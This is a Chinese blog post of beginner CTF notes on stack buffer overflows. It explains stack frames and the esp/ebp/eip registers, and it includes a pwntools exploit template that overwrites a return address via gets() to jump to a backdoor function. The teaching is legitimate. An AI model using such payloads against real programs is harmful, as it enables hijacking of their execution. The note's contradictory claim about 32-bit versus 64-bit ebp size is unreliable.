pwn栈溢出基础笔记

最新推荐文章于 2024-06-28 17:00:42 发布
最新推荐文章于 2024-06-28 17:00:42 发布
阅读量756 收藏 2
点赞数
分类专栏: pwn 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/129612959
版权
文章详细阐述了函数调用栈的工作原理,包括esp、ebp、eip寄存器的角色,函数调用时栈的变化以及如何通过栈溢出来影响程序执行。还介绍了栈溢出的概念,以及如何利用pwntools库进行安全测试和调试,特别提到了gets函数的安全隐患。
摘要由CSDN通过智能技术生成

1.栈的结构

函数调用栈是指程序运行时内存一段连续的区域。

用来保存函数运行时的状态信息等。

称之为“栈”是因为发生函数调用的时候,调用函数(caller)的状态保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。

在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态,恢复寄存器的值。

函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。

2.函数状态主要涉及三个寄存器——esp、ebp、eip。

esp用来存储函数调用栈的栈顶地址,在压栈和退栈时发生变化。

ebp用来存储当前函数状态的基地址 (base),在函数运行时不变,可以用来索引确定函数参数或局部变量。

eip用来存储即将执行的程序指令的地址,

cpu依照eip的储存内容读取指令并执行,eip随之指向相邻的下一条指令,如此反复,程序就得以连续执行指令。

函数调用的时候,栈的变化核心任务是将调用函数(caller)的状态保存起来,同时创建被调用函数(callee)的状态。

3.函数调用开始

首先将被调的函数(callee)的参数按照逆序压入栈内。如果被调用函数(callee)不需要参数,则没有这一步骤。这些参数会保存在调用函数(caller)的函数状态内,之后压入栈内的数据都会作为被调用函数(callee)的函数状态来保存。

压栈的过程中,esp寄存器的值会不断减小(对应于栈从内存高地址向低地址生长)。压入栈内的数据包括调用参数,返回地址,调用函数的基地址,以及局部变量,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。在发生调用时,程序还会将被调用函数(callee)的指令地址存到eip寄存器内,这样程序就可以依次执行调用函数的指令了。

4.函数调用结束的变化:

核心任务:丢弃被调用函数(callee)的状态,并将栈顶恢复为调用函数(caller)状态。

首先被调用函数的局部变量会从栈内直接弹出,栈顶会指向被调用函数(callee)的基地址

然后之前保存到栈基地地址pop到ebp中,这样调用函数的ebp(基地址)得以恢复。此时栈顶会指向返回地址。

然后将返回地址pop到eip中

至此程序恢复至原始状态

5.栈溢出

栈溢出就是想办法覆盖返回地址,

栈的生长是从高地址向低地址生长的,而被调用函数的局部变量又是从低地址向高地址覆盖的,

如果局部变量的长度超过定义的,就会覆盖返回地址

缓冲区好像就是定义的变量的内存。

64位和32位的ebp是不同的,32位的是8个字节,而32位的是16个字节。

修改权限

sudo chmod +x 文件名

gets函数是一个危险函数,因为他没有对输入的数据进行任何的限制

那就意味着,只要有gets函数,就会有栈溢出。

var_10:v4输入变量。

s:ebp

r:返回地址

6.脚本大概

脚本大概模板:

from pwn import *  #导入pwntools的库(python)
p=process("./文件名")   #获得该程序,并得到一个与该程序的接口,
#远程#p=remote("ip",port)
backdoor=(0x地址)
payload='a'*0x18+p64(backdoor)  #0x18个垃圾数据,填满变量缓冲区(var和ebp),到了返回地址,然后填充额为返回地址
p.recvuntil("Your suggestion:\n")  #有换行(puts函数默认是有换行的)
#因为我们已经对该进程有交互了,所以会不断读取输出,读到这句话会停下来进行下一步操作
p.sendline(payload)  #发送payload
p.interactive()   #通过终端进行交互

7.调试

调试:

gdb :

b main     #下断点

远程调试:

gdb.attach(p) #pwntools中一个和gdb交互的接口

这种方式我还没有成功,之前看视频说是必须要将gdb默认为pwngbd

cmd="b main"

cmd +="set ……"

后边可以加参数,attach(p,cmd)

attach后可以加pause()

获取进程号,并且可以停下来。

from pwn import *  #导入pwntools的库(python)
p=process("./文件名")   #获得该程序,并得到一个与该程序的接口,
#远程#p=remote("ip",port)
backdoor=(0x地址)
payload='a'*0x18+p64(backdoor)  #0x18个垃圾数据,填满变量缓冲区(var和ebp),到了返回地址,然后填充额为返回地址
gdb.attach(p)
p.recvuntil("Your suggestion:\n")  #有换行(puts函数默认是有换行的)
#因为我们已经对该进程有交互了,所以会不断读取输出,读到这句话会停下来进行下一步操作
p.sendline(payload)  #发送payload
p.interactive()   #通过终端进行交互

还可以通过

gdb -p 加进程id

这个文章好像不错

pwntools的使用技巧 · 大专栏 (dazhuanlan.com)

y6y6y666
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWN基础知识及基础栈溢出手法
山高路远
04-12 4011
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 621
写题笔记
字符串溢出(pwn溢出)--ret2syscall
莫慌的博客
09-29 765
pwn入门
PWN入门学习之简单的栈溢出
最新发布
2301_80718478的博客
06-28 610
栈溢出PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
ctf(pwn)栈溢出介绍
半岛铁盒的博客
03-05 1642
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致 与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是 程序必须向栈上写入数据。 写入的数据大小没有被良好地控制。 一般来说,我们会有如下的覆盖需求 覆盖函数返回地址,这时候就是直接看 EBP 即可。 覆盖栈上某个变量的内容,这时候就需要更加精细的.
PWN入门(2)栈溢出基础
农夫果园好好喝的博客
06-29 820
PWN栈溢出基础
Pwn,我的栈溢出笔记就该这么写(上)
weixin_54150681的博客
12-05 187
一周的刨坟结束了,忙着搭建维护k8s,该整个小小的笔记了 原理篇 什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 栈溢出会导致什么结果? 栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。 如何防范栈溢出? (1).金丝雀(canary) 1、 在所有函数调用发生时,向栈帧内压入一个额外的随机 DWORD(数),这个随机数被称作 “canary”,函数执行完在返回之前,程序通过检查这个随机数
linux3.13.0内核溢出漏洞exp,Linux Kernel Pwn 学习笔记(栈溢出)
weixin_42558758的博客
05-06 486
0x01 背景栈溢出是最基本的一个漏洞,学习 pwn栈溢出开始学习是比较简单的入门方式。之前也研究过 linux 内核,但因为种种原因不得不放弃。现在跟着安卓版主学习了几天linux内核漏洞,收获了不少知识,开始自己梳理和分享自己的笔记,特此感谢版主老师的教导0x02 内核基本知识Canary: 是防止栈溢出的保护,一般在 ebp-0x8 的位置,学习 linux pwn 的基本知识,不细讲K...
Pwn学习路线及学习笔记以及gem安装
10-15
在学习Pwn的过程中,需要了解栈溢出、格式化字符串等基本概念。作者建议在学习Pwn的同时,也学习相关的安全知识,例如CTF、Binary Exploitation等。 四、学习心得 作者认为学习Pwn需要耐心和坚持,需要一步一步地...
栈溢出原理及解题练习
weixin_44222568的博客
04-15 1906
一个小白的慢慢理会过程
【七日打卡】Pwn栈溢出利用详解
阿道夫的博客
12-22 978
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
PWN入门一函数调用和栈溢出
xlsj雪松的博客
10-19 2128
函数调用和栈溢出
pwn基础知识笔记
月阴荒的博客
02-20 2347
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
第一个pwn案例---栈溢出的学习
MrTreebook的博客
07-13 379
第一个pwn案例—栈溢出的学习 漏洞:利用gets()函数以回车判断输入结束,并不检查输入字符串长度的特点, 将函数返回地址改写成期望执行的函数地址 在64位条件下进行实验: 1.准备好测试的程序 #include <stdio.h> #include <string.h> void success() { puts("You have already pwned me."); } void vulnerable() { char s[12]; gets(s); puts(s); }
[pwn入门] 1. get函数缓冲区溢出
weixin_34092370的博客
01-17 690
查看保护 寻找漏洞 ida打开elf文件: gets函数存在缓冲区溢出漏洞,我们可以通过超长的字符串来覆盖缓冲区,从而修改ROP。为了达到这个目的,我们需要首先计算,输入的&s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址,就是记录了返回地址的位置 s距离返回地址的偏移 gdb打开,并设置断点。 $esp ...
pwn的五道基础
lllwky的博客
03-27 6912
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
[BackdoorCTF 2023] pwn
weixin_52640415的博客
12-22 677
libc2.35 uaf, 格式化字符串o
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2099
pwn 入门
ctfshow PWN 栈溢出
08-23
在ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值